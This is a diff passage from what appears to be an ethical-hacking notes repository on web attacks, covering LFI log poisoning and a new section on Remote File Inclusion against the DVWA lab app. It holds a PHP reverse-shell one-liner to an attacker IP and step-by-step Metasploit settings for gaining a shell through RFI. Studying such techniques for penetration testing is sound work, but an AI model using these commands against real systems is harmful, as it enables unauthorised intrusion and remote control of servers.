alessandro-ancona/Ethical-Hacking-Reporitory/Web-Hacking.md

 Where we URL encoded `php -r '$sock=fsockopen("10.8.32.131",5000);exec("/bin/sh -i <&3 >&3 2>&3");'`.
 This is also known as **Log poisoning**.
 For all other LFI-2-RCE (via /proc/self/environ, via upload, via PHPSESSID, via vsftpd logs ecc.) have a look on [HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion).

+# RFI

+Remote File Inclusion (RFI) is a technique to include remote files as a query to web applications.
+Such as LFI, RFI occurs when user input is improperly sanitized.
+RFI could easily allow an attacker to gain RCE on the server.

+## RFI-2-Shell

+Once checked for RFI vulnerability on a remote web application, suppose that a RFI is achieved by querying `http://victim-ip/dvwa/vulnerabilities/fi/?page=http://attacker-ip/test.php` :

+- Fire up Metasploit and use the module: `exploit/unix/webapp/php_include`
+- Set RHOSTS and RPORT depending on the web server.
+- Set HEADERS with all cookies or tokens.
+For example:

+      set HEADERS "Cookie:security=low; PHPSESSID=4c0c7c70dfafab05e7d04c88c8966aee"

+- Set the PATH to the base directory of the web page.
+For example:

+      set PATH /dvwa/vulnerabilities/fi/

+- Set the PHPURI which is the URI to request, with the included parameter changed to `XXpathXX`.
+For example:

+      set PHPURI /?page=XXpathXX

+- Finally, set the PHP bind shell as payload: `set PAYLOAD php/bind_php` and set for LHOST and LPORT of the attacker machine.

+If configured properly, a direct shell will open up.

 # SSRF